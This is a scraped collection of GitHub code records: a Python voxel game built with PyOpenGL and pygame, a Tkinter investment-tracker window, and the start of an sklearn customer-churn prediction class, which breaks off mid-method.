}\n","repo_name":"MartyOfMCA/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4806433128","text":"from __future__ import annotations\nimport glfw\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nimport math\nfrom utils import HitResult, bresenham, VertexDrawer, JSONWithCommentsDecoder\nfrom textures import TextureManager\nfrom tiles import BLOCK_TYPES\nfrom window import GameWindow\nimport os\nos.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = \"hide\"\nimport pygame\nfrom player import Player\nfrom menus import *\nfrom constants import *\nfrom font import Font\nfrom world import World\n\nclass GameSettings:\n def __init__(self):\n self.fog_distance = 1\n self.show_block_preview = True\n self.sound_enabled = True\n self.vsync = True\n self.language = \"en_us\"\n\n def load(self):\n try:\n with open(\"settings.txt\", \"r\") as f:\n for line in f.readlines():\n ln = line.strip()\n option_ln = ln.split(\":\")\n\n if len(option_ln) < 2:\n continue\n\n if option_ln[0] == \"fog_distance\" and option_ln[1].isnumeric():\n self.fog_distance = int(option_ln[1])\n\n if option_ln[0] == \"show_block_preview\":\n self.show_block_preview = option_ln[1] == \"True\"\n\n if option_ln[0] == \"vsync\":\n self.vsync = option_ln[1] == \"True\"\n \n if option_ln[0] == \"sound\":\n self.sound_enabled = option_ln[1] == \"True\"\n \n if option_ln[0] == \"language\":\n self.language = option_ln[1] if [\"en_us\", \"pt_pt\"].count(option_ln[1]) > 0 else \"en_us\"\n except Exception:\n pass\n \n def save(self):\n with open(\"settings.txt\", \"w\") as f:\n f.write(f\"vsync:{self.vsync}\\n\")\n f.write(f\"fog_distance:{self.fog_distance}\\n\")\n f.write(f\"show_block_preview:{self.show_block_preview}\\n\")\n f.write(f\"sound:{self.sound_enabled}\\n\")\n f.write(f\"language:{self.language}\")\n\nclass Game:\n def __init__(self):\n self.show_debug = False\n self.window = GameWindow(self, 700, 450)\n self.settings = GameSettings()\n self.texture_manager = TextureManager()\n self.current_fps = 0\n self.mouse = {\n 'x': 0,\n 'y': 0,\n 'dx': 0,\n 'dy': 0\n }\n self.running = True\n self.player: Player | None = None \n self.__menu: Menu | None = None\n self.window.mouse_button_func(self.on_mouse_button)\n self.window.scroll_func(self.on_scroll)\n self.window.size_changed_func(self.on_framebuffer_size_changed)\n self.window.cursor_pos_func(self.on_cursor_pos)\n self.window.key_func(self.on_key)\n self.world: World | None = None\n self.hit_result: HitResult | None = None\n self.font = Font(self)\n self.selected_tile = 1\n self.chunk_updates = 0\n self.workaround_hit_face = 0\n self.click_sound = pygame.mixer.Sound(\"res/sounds/click.mp3\")\n self.block_sound = pygame.mixer.Sound(\"res/sounds/block.mp3\")\n self.block_sound.set_volume(0.7)\n self.translations = {}\n\n @property\n def menu(self):\n return self.__menu\n \n @menu.setter\n def menu(self, menu):\n if self.__menu != None:\n self.__menu.on_remove()\n\n self.__menu = menu\n\n if self.__menu != None:\n self.__menu.on_display()\n\n def load_translations(self):\n with open(f\"res/languages/{self.settings.language}.json\", \"r\", encoding=\"utf-8\") as f:\n self.translations = json.load(f)\n\n def translate_key(self, key: str, *args: object):\n translation: str = key if self.translations.get(key) == None else self.translations.get(key) \n try:\n return translation.format(*args)\n except Exception:\n return translation\n\n def play_sound(self, sound: pygame.mixer.Sound):\n if self.settings.sound_enabled:\n pygame.mixer.Sound.play(sound)\n\n def start_world(self):\n self.menu = LoadingTerrainMenu(self)\n\n def load_world(self):\n self.world = World(self)\n self.grab_mouse()\n self.menu = None\n\n def shutdown(self):\n self.running = False\n\n def on_scroll(self, x_offset, y_offset):\n step = 1 if y_offset > 0 else -1\n\n self.selected_tile -= step\n\n if self.selected_tile < 1:\n self.selected_tile = 9\n\n if self.selected_tile > 9:\n self.selected_tile = 1\n\n def on_framebuffer_size_changed(self):\n glViewport(0, 0, self.window.width, self.window.height)\n if self.menu != None:\n self.menu.resize()\n\n def on_mouse_button(self, button: int, action: int):\n if action == glfw.PRESS and button == 0 and self.menu != None:\n self.menu.mouse_clicked((self.mouse['x'] / self.window.scale_factor, self.mouse['y'] / self.window.scale_factor))\n\n if action == glfw.PRESS and button == 0 and self.menu == None and self.hit_result != None:\n self.world.set_tile(self.hit_result.bx, self.hit_result.by, self.hit_result.bz, 0)\n self.play_sound(self.block_sound)\n \n if action == glfw.PRESS and button == 1 and self.menu == None and self.hit_result != None:\n self.world.set_tile(self.hit_result.bx, self.hit_result.by + 1, self.hit_result.bz, self.selected_tile)\n self.play_sound(self.block_sound)\n \n def on_cursor_pos(self, xpos, ypos):\n self.mouse['dx'] = xpos - self.mouse['x']\n self.mouse['dy'] = self.mouse['y'] - ypos\n self.mouse['x'] = xpos\n self.mouse['y'] = ypos\n\n def on_key(self, key, scancode, action):\n if action == glfw.PRESS and self.menu != None:\n self.menu.key_pressed(key)\n\n if action == glfw.PRESS and key == glfw.KEY_ESCAPE and self.menu == None:\n self.menu = PauseMenu(self)\n self.ungrab_mouse()\n\n if action == glfw.PRESS and key == glfw.KEY_F7:\n self.texture_manager.reload_textures()\n\n if action == glfw.PRESS and key == glfw.KEY_F and self.menu == None:\n self.settings.fog_distance += 1\n if self.settings.fog_distance > 3:\n self.settings.fog_distance = 1\n\n if action == glfw.PRESS and key == glfw.KEY_F3:\n self.show_debug = not self.show_debug\n\n if action == glfw.PRESS and self.menu == None and key == glfw.KEY_N:\n self.workaround_hit_face += 1\n if self.workaround_hit_face > 5:\n self.workaround_hit_face = 0\n\n if action == glfw.PRESS and (key >= glfw.KEY_1 and key <= glfw.KEY_9):\n self.selected_tile = key - glfw.KEY_0\n\n def grab_mouse(self):\n glfw.set_cursor_pos(self.window.handle, self.window.width / 2, self.window.height / 2)\n glfw.set_input_mode(self.window.handle, glfw.CURSOR, glfw.CURSOR_DISABLED)\n\n def ungrab_mouse(self):\n glfw.set_input_mode(self.window.handle, glfw.CURSOR, glfw.CURSOR_NORMAL)\n glfw.set_cursor_pos(self.window.handle, self.window.width / 2, self.window.height / 2)\n\n def get_camera_pos(self):\n return [self.player.x, self.player.y, self.player.z]\n\n def run(self):\n self.settings.load()\n self.load_translations()\n self.window.init(\"Voxels\")\n self.texture_manager.load('grass.png')\n self.texture_manager.load('gui.png')\n self.texture_manager.load('bg.png')\n self.texture_manager.load('prof.png')\n self.texture_manager.load('not_bedrock.png')\n self.menu = MainMenu(self)\n\n glClearColor(0.239, 0.686, 0.807, 1.0)\n last_time = glfw.get_time()\n frame_counter = 0\n tick_last_time = glfw.get_time()\n tick_delta = 0\n\n while self.running:\n if self.window.should_close():\n self.running = False\n\n tick_now = glfw.get_time()\n tick_passed_sec = tick_now - tick_last_time\n tick_last_time = tick_now\n tick_delta += tick_passed_sec * 60 / 1.0\n ticks = int(tick_delta)\n tick_delta -= ticks\n\n for _ in range(0, ticks):\n self.tick()\n\n dx = self.mouse['dx']\n dy = self.mouse['dy']\n if self.menu == None and self.world != None:\n self.player.turn(dx, dy)\n self.mouse['dx'] = 0\n self.mouse['dy'] = 0\n \n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n self.render(tick_delta)\n \n self.window.update_frame()\n\n frame_counter += 1\n\n now = glfw.get_time()\n if now - last_time > 1.0:\n last_time = now\n self.current_fps = frame_counter\n frame_counter = 0\n\n self.settings.save()\n if self.world != None:\n self.world.dispose()\n self.texture_manager.dispose()\n glfw.terminate()\n\n def render(self, tick_delta: float):\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n gluPerspective(70, self.window.width / self.window.height, 0.05, 1000.0)\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n\n glEnable(GL_TEXTURE_2D)\n glEnable(GL_DEPTH_TEST)\n glEnable(GL_CULL_FACE)\n \n if self.world != None:\n glTranslatef(0, 0, -0.3)\n glRotatef(self.player.rot_x, 1.0, 0.0, 0.0);\n glRotatef(self.player.rot_y, 0.0, 1.0, 0.0);\n\n player_x = self.player.old_x + (self.player.x - self.player.old_x) * tick_delta\n player_y = self.player.old_y + (self.player.y - self.player.old_y) * tick_delta\n player_z = self.player.old_z + (self.player.z - self.player.old_z) * tick_delta\n\n glTranslatef(-player_x, -player_y, -player_z)\n\n # idek\n start_pos = self.get_camera_pos()\n end_pos = self.get_camera_pos()\n rv0 = math.cos(-self.player.rot_y * (math.pi / 180.0) - math.pi)\n rv1 = math.sin(-self.player.rot_y * (math.pi / 180.0) - math.pi)\n rv2 = -math.cos(-self.player.rot_x * math.pi / 180.0)\n rv3 =-math.sin(-self.player.rot_x * math.pi / 180.0)\n\n end_pos[0] -= rv1 * rv2 * 7\n end_pos[1] -= rv3 * 7\n end_pos[2] -= rv0 * rv2 * 7\n #\n\n self.hit_result = bresenham(self.world, start_pos, end_pos, lambda tile_id : BLOCK_TYPES[tile_id])\n\n self.texture_manager.get(\"grass.png\").bind()\n self.world.render()\n\n if self.hit_result != None:\n glDisable(GL_TEXTURE_2D)\n \n selx0 = self.hit_result.bx - 0.005\n sely0 = self.hit_result.by - 0.005\n selz0 = self.hit_result.bz - 0.005\n selx1 = self.hit_result.bx + 1.005\n sely1 = self.hit_result.by + 1.005\n selz1 = self.hit_result.bz + 1.005\n \n glColor4f(0.0, 0.0, 0.0, 1.0)\n glBegin(GL_LINES)\n # ver\n glVertex3f(selx0, sely0, selz0)\n glVertex3f(selx0, sely1, selz0)\n glVertex3f(selx1, sely0, selz0)\n glVertex3f(selx1, sely1, selz0)\n glVertex3f(selx1, sely0, selz1)\n glVertex3f(selx1, sely1, selz1)\n glVertex3f(selx0, sely0, selz1)\n glVertex3f(selx0, sely1, selz1)\n # hor\n glVertex3f(selx0, sely0, selz0)\n glVertex3f(selx1, sely0, selz0)\n\n glVertex3f(selx0, sely0, selz1)\n glVertex3f(selx1, sely0, selz1)\n\n glVertex3f(selx0, sely0, selz0)\n glVertex3f(selx0, sely0, selz1)\n\n glVertex3f(selx1, sely0, selz0)\n glVertex3f(selx1, sely0, selz1)\n\n glVertex3f(selx0, sely1, selz0)\n glVertex3f(selx1, sely1, selz0)\n\n glVertex3f(selx0, sely1, selz1)\n glVertex3f(selx1, sely1, selz1)\n\n glVertex3f(selx0, sely1, selz0)\n glVertex3f(selx0, sely1, selz1)\n\n glVertex3f(selx1, sely1, selz0)\n glVertex3f(selx1, sely1, selz1)\n glEnd()\n glEnable(GL_TEXTURE_2D)\n\n glClear(GL_DEPTH_BUFFER_BIT)\n\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n glOrtho(0, self.window.scaled_width(), self.window.scaled_height(), 0, 1000.0, 3000.0)\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n glTranslatef(0.0, 0.0, -2000.0)\n\n glDisable(GL_DEPTH_TEST)\n glDisable(GL_CULL_FACE)\n\n glEnable(GL_BLEND)\n glBlendFunc(GL_ONE_MINUS_DST_COLOR, GL_ONE_MINUS_SRC_COLOR)\n self.draw_texture(\"gui.png\", self.window.scaled_width() / 2 - 8, self.window.scaled_height() / 2 - 8, 16, 16, 240, 0, 16, 16, 256, 256)\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\n self.draw_texture(\"gui.png\", self.window.scaled_width() / 2 - 91, self.window.scaled_height() - 22, 182, 22, 0, 0, 182, 22, 256, 256)\n \n self.texture_manager.get(\"grass.png\").bind()\n \n if self.settings.show_block_preview:\n glEnable(GL_CULL_FACE)\n glPushMatrix()\n glTranslatef(self.window.scaled_width() - 45, 80, 20)\n glRotatef(-20, 1, 0, 0)\n glRotatef(44, 0, 1, 0)\n glTranslatef(0, -10, 0)\n glScalef(26, -26, 26)\n\n tile_type = BLOCK_TYPES[self.selected_tile]\n vertex_drawer = VertexDrawer()\n vertex_drawer.begin(GL_QUADS)\n tile_type.render_in_gui(vertex_drawer=vertex_drawer)\n vertex_drawer.flush()\n glPopMatrix()\n glDisable(GL_CULL_FACE)\n\n for i in range(0, 9):\n tile_txr = BLOCK_TYPES[i + 1].north_txr\n self.draw_texture(\"grass.png\", self.window.scaled_width() / 2 - 91 + 3 + i * 20, self.window.scaled_height() - 22 + 3, 16, 16, (tile_txr % 16) * 16, (tile_txr // 16) * 16, 16, 16, 256, 256)\n\n self.draw_texture(\"gui.png\", self.window.scaled_width() / 2 - 91 + (self.selected_tile - 1) * 20, self.window.scaled_height() - 22 - 1, 24, 24, 40, 22, 24, 24, 256, 256)\n\n glDisable(GL_BLEND)\n\n if self.world != None:\n self.font.draw_text(GAME_VERSION, 1, 1, 0xFFFFFF, 0)\n\n if self.show_debug:\n self.font.draw_text(f\"{self.current_fps} FPS\", 1, 11, 0xFFFFFF, 0)\n self.font.draw_text(f\"{'X: {:.4f}'.format(self.player.x)}\", 1, 21, 0xFFFFFF, 0)\n self.font.draw_text(f\"{'Y: {:.4f}'.format(self.player.y)}\", 1, 31, 0xFFFFFF, 0)\n self.font.draw_text(f\"{'Z: {:.4f}'.format(self.player.z)}\", 1, 41, 0xFFFFFF, 0)\n self.font.draw_text(f\"Selected Tile: {self.selected_tile}\", 1, 51, 0xFFFFFF, 0)\n self.font.draw_text(\"Press F3 to show/hide debug\", 1, 71, 0xFFFFFF, 0)\n self.font.draw_text(\"Press 1-9 to select blocks\", 1, 81, 0xFFFFFF, 0)\n self.font.draw_text(\"Press F7 to reload textures\", 1, 91, 0xFFFFFF, 0)\n self.font.draw_text(f\"Python {platform.sys.version_info.major}.{platform.sys.version_info.minor}.{platform.sys.version_info.micro}\", self.window.scaled_width() - 1, 1, 0xFFFFFF, 1)\n self.font.draw_text(f\"Display: {self.window.width}x{self.window.height}\", self.window.scaled_width() - 1, 21, 0xFFFFFF, 1)\n else:\n self.font.draw_text(\"Press F3 to show debug\", 1, 11, 0xFFFFFF, 0)\n self.font.draw_text(\"Press 1-9 to select blocks\", 1, 21, 0xFFFFFF, 0)\n\n if self.menu != None:\n self.menu.render(self, (self.mouse['x'] / self.window.scale_factor, self.mouse['y'] / self.window.scale_factor))\n\n def draw_texture_nineslice(self, texture_name, pos: tuple[int, int], size: tuple[int, int], uv: tuple[int, int], uv_size: tuple[int, int], nineslice: tuple[int, int, int, int], tw: int, th: int):\n self.texture_manager.get(texture_name).bind()\n glColor4f(1.0, 1.0, 1.0, 1.0)\n glBegin(GL_QUADS) \n # Top Left\n self.__draw_texture_quad(pos[0], pos[1], nineslice[0], nineslice[1], uv[0], uv[1], nineslice[0], nineslice[1], tw, th)\n # Top Middle\n self.__draw_texture_quad(pos[0] + nineslice[0], pos[1], size[0] - nineslice[0] - nineslice[2], nineslice[1], uv[0] + nineslice[0], uv[1], uv_size[0] - nineslice[0] - nineslice[2], nineslice[1], tw, th)\n # Top Right\n self.__draw_texture_quad(pos[0] + size[0] - nineslice[2], pos[1], nineslice[2], nineslice[1], uv[0] + uv_size[0] - nineslice[2], uv[1], nineslice[2], nineslice[1], tw, th)\n # Left Middle\n self.__draw_texture_quad(pos[0], pos[1] + nineslice[1], nineslice[0], size[1] - nineslice[1] - nineslice[3], uv[0], uv[1] + nineslice[1], nineslice[0], uv_size[1] - nineslice[2] - nineslice[3], tw, th)\n # Center\n self.__draw_texture_quad(pos[0] + nineslice[0], pos[1] + nineslice[1], size[0] - nineslice[0] - nineslice[2], size[1] - nineslice[1] - nineslice[3], uv[0] + nineslice[0], uv[1] + nineslice[1], uv_size[0] - nineslice[0] - nineslice[2], uv_size[1] - nineslice[1] - nineslice[3], tw, th)\n # Right Middle\n self.__draw_texture_quad( pos[0] + size[0] - nineslice[2], pos[1] + nineslice[1], nineslice[2], size[1] - nineslice[1] - nineslice[3], uv[0] + uv_size[0] - nineslice[2], uv[1] + nineslice[1], nineslice[2], uv_size[1] - nineslice[1] - nineslice[3], tw, th)\n # Bottom Left\n self.__draw_texture_quad(pos[0], pos[1] + size[1] - nineslice[3], nineslice[0], nineslice[3], uv[0], uv[1] + uv_size[1] - nineslice[3], nineslice[0], nineslice[3], tw, th)\n # Bottom Middle\n self.__draw_texture_quad(pos[0] + nineslice[0], pos[1] + size[1] - nineslice[3], size[0] - nineslice[0] - nineslice[2], nineslice[3], uv[0] + nineslice[0], uv[1] + uv_size[1] - nineslice[2], uv_size[0] - nineslice[0] - nineslice[2], nineslice[3], tw, th)\n # Bottom Right\n self.__draw_texture_quad(pos[0] + size[0] - nineslice[2], pos[1] + size[1] - nineslice[3], nineslice[2], nineslice[3], uv[0] + uv_size[0] - nineslice[2], uv[1] + uv_size[1] - nineslice[3], nineslice[2], nineslice[3], tw, th)\n glEnd()\n\n def __draw_texture_quad(self, x: int, y: int, width: int, height: int, u: int, v: int, us: int, vs: int, tw: int, th: int):\n u0 = u / tw\n v0 = v / th\n u1 = (u + us) / tw\n v1 = (v + vs) / th\n \n glTexCoord2f(u0, v0)\n glVertex3f(x, y, 0)\n glTexCoord2f(u0, v1)\n glVertex3f(x, y + height, 0)\n glTexCoord2f(u1, v1)\n glVertex3f(x + width, y + height, 0)\n glTexCoord2f(u1, v0)\n glVertex3f(x + width, y, 0)\n\n def draw_rect(self, pos: tuple[int, int], size: tuple[int, int], color: int = 0xFFFFFFFF):\n glEnable(GL_BLEND)\n glDisable(GL_TEXTURE_2D)\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\n glColor4f((color >> 16 & 0xFF) / 255.0, (color >> 8 & 0xFF) / 255.0, (color & 0xFF) / 255.0, (color >> 24 & 0xFF) / 255.0)\n glBegin(GL_QUADS)\n glVertex3f(pos[0], pos[1], 0)\n glVertex3f(pos[0], pos[1] + size[1], 0)\n glVertex3f(pos[0] + size[0], pos[1] + size[1], 0)\n glVertex3f(pos[0] + size[0], pos[1], 0)\n glEnd()\n glColor4f(1.0, 1.0, 1.0, 1.0)\n glDisable(GL_BLEND)\n glEnable(GL_TEXTURE_2D)\n\n def draw_texture(self, texture_name, x: int, y: int, width: int, height: int, u: int, v: int, us: int, vs: int, tw: int, th: int, color: int = 0xFFFFFF):\n self.texture_manager.get(texture_name).bind()\n\n glColor4f((color >> 16 & 0xFF) / 255.0, (color >> 8 & 0xFF) / 255.0, (color & 0xFF) / 255.0, 1.0)\n glBegin(GL_QUADS)\n self.__draw_texture_quad(x, y, width, height, u, v, us, vs, tw, th)\n glEnd()\n\n def tick(self):\n if self.world != None:\n self.world.tick()\n self.player.tick()\n\nif __name__ == \"__main__\":\n pygame.init()\n game = Game()\n game.run()\n pygame.quit()","repo_name":"KalmeMarq/python-cc-projects","sub_path":"voxels/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73362156212","text":"from Tkinter import *\nimport os\nimport runpy\n\nmf=Tk()\n\n#defining functions\ndef open_home():\n mf.destroy()\n runpy.run_path(\"home.py\")\n\ndef open_stocks():\n mf.destroy()\n runpy.run_path(\"mf.py\")\n \ndef open_re():\n mf.destroy()\n runpy.run_path(\"re.py\")\n \ndef open_gold():\n mf.destroy()\n runpy.run_path(\"gold.py\")\n \ndef open_cash():\n mf.destroy()\n runpy.run_path(\"cash.py\")\n \ndef open_bonds():\n mf.destroy()\n runpy.run_path(\"bonds.py\")\n\ndef mf_form():\t\t\t#entry form\n\tinputform = Tk()\n\t\n\t\n\tinputform.title=(\"Add New Mutual Fund\")\n\t\n\tLabel(inputform , text=\"Add new Mutual Fund\" , font = \"Lato 20\").grid(row=0)\n\t\n\tstock_symbol = Label(inputform , text= \"Fund Name\" , font = \"Lato 15\" , fg = 'White', bg='Black', width=20)\n\tstock_symbol.grid(row=1,column=0)\n\tget_fund = Entry(inputform,width=20).grid(row=1 , column=1)\n\t\n\tnumber_of_units = Label(inputform , text= \"Number of units\" , font = \"Lato 15\" , fg = 'White', bg='Black', width=20)\n\tnumber_of_units.grid(row=2,column=0)\n\tget_unit = Entry(inputform).grid(row=2 , column=1)\n\t\n\tprice= Label(inputform, text=\"Purchase Price\" ,font = \"Lato 15\" , fg = 'White', bg='Black',width=20)\n\tprice.grid(row=3,column=0)\n\tget_price = Entry(inputform).grid(row=3 , column=1)\n\t\n\tdate_purchase= Label(inputform , text =\"Date of Purchase\" ,font = \"Lato 15\" , fg = 'White', bg='Black',width=20)\n\tdate_purchase.grid(row=4,column=0)\n\tget_date = Entry(inputform).grid(row= 4, column=1)\n\t\n\taccept = Button(inputform, text=\"Accept\", font = \"Lato 15\" , fg = 'Black' , width=40,command=lambda:inputform.destroy())\n\taccept.grid(row=5)\n\t \n\tinputform.mainloop()\n\n#defining the rest of mf.py\t\n\nmf.title(\"LIT\")\nmf.geometry(\"1920x1080\")\n\nl1=Label(mf,text=\" \", font=\"Lato 20\").pack()\nl2=Label(mf, text=\"L O N G - T E R M I N V E S T M E N T T R A C K E R\", font=\"Lato 30\").pack()\n\ntop = Frame(mf)\ntop.pack(side=TOP)\n\nl3=Label(mf,text=\"Mutual Funds\", font=\"Lato 20\").pack()\n\nmainoptions = ['Home', 'Stocks', 'Mutual Funds','Real estate','Gold', 'Cash', 'Bonds']\ni=0\n\nl1 = Button(mf,text=mainoptions[i], font=\"Lato 20\",fg='White',bg='Black', command= open_home)\nl1.place(x = 0, y = 200 + i*51, width=200, height=50)\ni+=1\n\nl2 = Button(mf,text=mainoptions[i], font=\"Lato 20\",fg='White',bg='Black',command= open_stocks)\nl2.place(x = 0, y = 200 + i*51, width=200, height=50)\ni+=1\n\nl3 = Button(mf,text=mainoptions[i], font=\"Lato 20\",fg='White',bg='Black')\nl3.place(x = 0, y = 200 + i*51, width=200, height=50)\ni+=1\n\nl4 = Button(mf,text=mainoptions[i], font=\"Lato 20\",fg='White',bg='Black', command=open_re)\nl4.place(x = 0, y = 200 + i*51, width=200, height=50)\ni+=1\n\nl5 = Button(mf,text=mainoptions[i], font=\"Lato 20\",fg='White',bg='Black', command=open_gold)\nl5.place(x = 0, y = 200 + i*51, width=200, height=50)\ni+=1\n\nl6 = Button(mf,text=mainoptions[i], font=\"Lato 20\",fg='White',bg='Black', command=open_cash)\nl6.place(x = 0, y = 200 + i*51, width=200, height=50)\ni+=1\n\nl7 = Button(mf,text=mainoptions[i], font=\"Lato 20\",fg='White',bg='Black', command=open_bonds)\nl7.place(x = 0, y = 200 + i*51, width=200, height=50)\ni+=1\n\nadd_entry = Button(mf, text=\"Add an entry\", font= \"Lato 20\" , fg = 'White' , bg ='Black' ,command= mf_form ) #give command\nadd_entry.place (x= 1600 , y=900 , width=200 , height =50)\nmainloop()\n\n","repo_name":"anshul-pinto/anshul","sub_path":"mf.py","file_name":"mf.py","file_ext":"py","file_size_in_byte":3260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9504074280","text":"# library doc string\n\"\"\"\nModule that defines all necessary functions as part of a class, that can be used to analyze the\ndata provided in /data, perform some EDA on the data and save the resulting images to /images\nand trains a machine learning model, that is saved in /models.\n\n\nAuthor: David Hedderich\nDate: 26.02.2023\n\"\"\"\n# import libraries\n\nfrom sklearn.metrics import plot_roc_curve, classification_report\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nimport shap\nimport joblib\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom constants import random_forest_search_space, logreg_solver, logreg_max_iter\nsns.set()\n\n\nclass ChurnPredictor():\n \"\"\"\n The following class imports data from ./data, performs an EDA, saves the EDA results to a \n folder, encodes specific columns, performs feature engineering, trains a machine learning\n model, saves a training report to ./images/results and saves the machine learning models\n to ./models\n Arguments:\n - path: (str) a path to the csv\n - target_column: (str) column that holds the binary classification resulting in either\n \"Churn\" (1) or \"No Churn (0) target_column_churn_name: (str) name of the positive\n class within the binary classification target column that represents the \"Churn\" (1),\n if the target column is categorical\n - target_column_churn_name: (str) Name of the positive class in the target_column.\n\n Methods:\n import_data: returns dataframe for the csv found at pth\n \n \"\"\"\n\n # pylint: disable=too-many-instance-attributes\n def __init__(self, path, target_column, target_column_churn_name):\n \"\"\"\n initializes the class ChurnPredictor and assigns the input parameters\n\n input:\n path: (str) a path to the csv\n target_column: (str) column that holds the binary classification resulting in\n either \"Churn\" (1) or \"No Churn (0) target_column_churn_name: (str) name of\n the positive class within the binary classification target column that \n represents the \"Churn\" (1), if the target column is categorical\n \"\"\"\n self.path = path\n self.target_column = target_column\n self.target_column_churn_name = target_column_churn_name\n\n self.dataframe = self.import_data()\n\n self.cat_columns, self.num_columns = self.perform_eda()\n self.encoder_helper()\n self.x_train, self.x_test, self.y_train, self.y_test = self.perform_feature_engineering()\n self.y_train_preds_rf, self.y_test_preds_rf, \\\n self.y_train_preds_lr, self.y_test_preds_lr = self.train_models()\n self.classification_report_image()\n self.feature_importance_plot()\n\n\n def import_data(self):\n \"\"\" returns dataframe for the csv found at path\n\n input:\n self.path: (str) a path to the csv\n output:\n self.dataframe: (DataFrame) pandas dataframe\n \"\"\"\n\n # Read in .csv file\n dataframe = pd.read_csv(self.path, index_col=0)\n\n # Encode target column to create a binary classification problem\n dataframe[self.target_column] = dataframe[self.target_column].apply(\n lambda val: 1 if val == self.target_column_churn_name else 0)\n\n return dataframe\n\n def perform_eda(self):\n '''\n perform eda on df and save figures to images folder\n input:\n self.dataframe: (DataFrame) pandas dataframe\n\n output:\n None\n '''\n\n # Print out some overview metrics regarding the dataset\n print(\"SUMMARY of the imported data: \\n\")\n print(\"Shape: \\n\")\n print(self.dataframe.shape)\n print(\"Number of NaN values: \\n\")\n print(self.dataframe.isnull().sum())\n print(\"Statistics of numerical columns: \\n\")\n print(self.dataframe.describe())\n\n # Identify column types\n cat_columns = self.dataframe.select_dtypes(include='object').columns\n num_columns = self.dataframe.select_dtypes(\n include=['int', 'float']).columns\n\n # Plot and save univariate analysis and bivariate analysis\n for column in num_columns:\n fig = plt.figure(figsize=(20, 10))\n self.dataframe[column].hist()\n fig.savefig(f'images/eda/{column}_num_univariate.png')\n plt.close(fig)\n\n for column in cat_columns:\n fig = plt.figure(figsize=(20, 10))\n self.dataframe[column].value_counts('normalize').plot(kind='bar')\n fig.savefig(f'images/eda/{column}_cat_univariate.png'.format(column))\n plt.close(fig)\n\n fig = plt.figure(figsize=(20, 10))\n sns.heatmap(\n self.dataframe.corr(),\n annot=False,\n cmap='Dark2_r',\n linewidths=2)\n fig.savefig('images/eda/bivariate.png')\n plt.close(fig)\n\n return cat_columns, num_columns\n\n def encoder_helper(self):\n '''\n helper function to turn each categorical column into a new column with\n propotion of churn for each category - associated with cell 15 from the notebook\n\n input:\n self.dataframe: (DataFrame) pandas dataframe\n self.cat_columns: (list) list of columns that contain categorical features\n\n output:\n None\n '''\n\n for column in self.cat_columns:\n helper_lst = []\n cat_column_groups = self.dataframe.groupby(column).mean()[\n self.target_column]\n\n for val in self.dataframe[column]:\n helper_lst.append(cat_column_groups.loc[val])\n\n self.dataframe[column] = helper_lst\n\n def perform_feature_engineering(self):\n '''\n input:\n self.dataframe: (DataFrame) pandas dataframe\n\n output:\n x_train: x training data\n x_test: x testing data\n y_train: y training data\n y_test: y testing data\n '''\n\n df_train_columns = self.dataframe.drop([self.target_column], axis=1)\n x_train, x_test, y_train, y_test = train_test_split(\n df_train_columns, self.dataframe[self.target_column], test_size=0.3, random_state=42)\n return x_train, x_test, y_train, y_test\n\n def train_models(self):\n '''\n train, store model results: images + scores, and store models\n input:\n self.x_train: x training data\n self.x_test: x testing data\n self.y_train: y training data\n self.y_test: y testing data\n output:\n y_train_preds_lr: training predictions from logistic regression\n y_train_preds_rf: training predictions from random forest\n y_test_preds_lr: test predictions from logistic regression\n y_test_preds_rf: test predictions from random forest\n '''\n # grid search\n rfc = RandomForestClassifier(random_state=42)\n lrc = LogisticRegression(solver=logreg_solver, max_iter=logreg_max_iter)\n\n # Define search space for Random Forest\n param_grid = random_forest_search_space\n\n cv_rfc = GridSearchCV(estimator=rfc, param_grid=param_grid, cv=5)\n cv_rfc.fit(self.x_train, self.y_train)\n lrc.fit(self.x_train, self.y_train)\n\n y_train_preds_rf = cv_rfc.best_estimator_.predict(self.x_train)\n y_test_preds_rf = cv_rfc.best_estimator_.predict(self.x_test)\n\n y_train_preds_lr = lrc.predict(self.x_train)\n y_test_preds_lr = lrc.predict(self.x_test)\n\n # save best model\n joblib.dump(cv_rfc.best_estimator_, './models/rfc_model.pkl')\n joblib.dump(lrc, './models/logistic_model.pkl')\n\n return y_train_preds_rf, y_test_preds_rf, y_train_preds_lr, y_test_preds_lr\n\n def classification_report_image(self):\n '''\n produces classification report for training and testing results and stores report as image\n in images folder\n input:\n self.y_train: training response values\n self.y_test: test response values\n y_train_preds_lr: training predictions from logistic regression\n y_train_preds_rf: training predictions from random forest\n y_test_preds_lr: test predictions from logistic regression\n y_test_preds_rf: test predictions from random forest\n\n output:\n None\n '''\n # Print scores to terminal\n print('random forest results')\n print('test results')\n print(classification_report(self.y_test, self.y_test_preds_rf))\n print('train results')\n print(classification_report(self.y_train, self.y_train_preds_rf))\n\n print('logistic regression results')\n print('test results')\n print(classification_report(self.y_test, self.y_test_preds_lr))\n print('train results')\n print(classification_report(self.y_train, self.y_train_preds_lr))\n\n # Load models\n rfc_model = joblib.load('./models/rfc_model.pkl')\n lr_model = joblib.load('./models/logistic_model.pkl')\n\n # Create and save ROC curves\n lrc_plot = plot_roc_curve(lr_model, self.x_test, self.y_test)\n lrc_plot.figure_.savefig('images/results/logistic_model_roc.png')\n\n rfc_plot = plot_roc_curve(rfc_model, self.x_test, self.y_test)\n 